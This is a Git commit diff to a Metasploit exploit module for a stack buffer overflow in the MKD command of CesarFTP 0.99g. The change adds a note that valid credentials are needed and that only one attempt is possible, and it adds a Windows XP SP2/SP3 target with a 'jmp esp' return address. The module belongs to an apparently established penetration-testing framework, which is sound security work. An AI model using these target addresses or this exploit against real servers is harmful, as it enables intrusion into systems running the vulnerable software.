updated description, added xp sp2+sp3 target, see #687

git-svn-id: file:///home/svn/framework3/trunk@7853 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2009-12-14 19:04:40 +00:00
parent 0efbe3baf9
commit ef0d86720a
1 changed files with 6 additions and 1 deletions

View File

@ -23,6 +23,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Cesar FTP 0.99g MKD Command Buffer Overflow', 'Name' => 'Cesar FTP 0.99g MKD Command Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a stack overflow in the MKD verb in CesarFTP 0.99g. This module exploits a stack overflow in the MKD verb in CesarFTP 0.99g.
You must have valid credentials to trigger this vulnerability. Also, you
only get one chance, so choose your target carefully.
}, },
'Author' => 'MC', 'Author' => 'MC',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
@ -50,7 +53,9 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ], [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
[ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ], [ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ],
[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
#[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
#[ 'Windows XP SP3 English', { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll
[ 'Windows 2003 SP1 English', { 'Ret' => 0x76AA679b } ], [ 'Windows 2003 SP1 English', { 'Ret' => 0x76AA679b } ],
], ],
'DisclosureDate' => 'Jun 12 2006', 'DisclosureDate' => 'Jun 12 2006',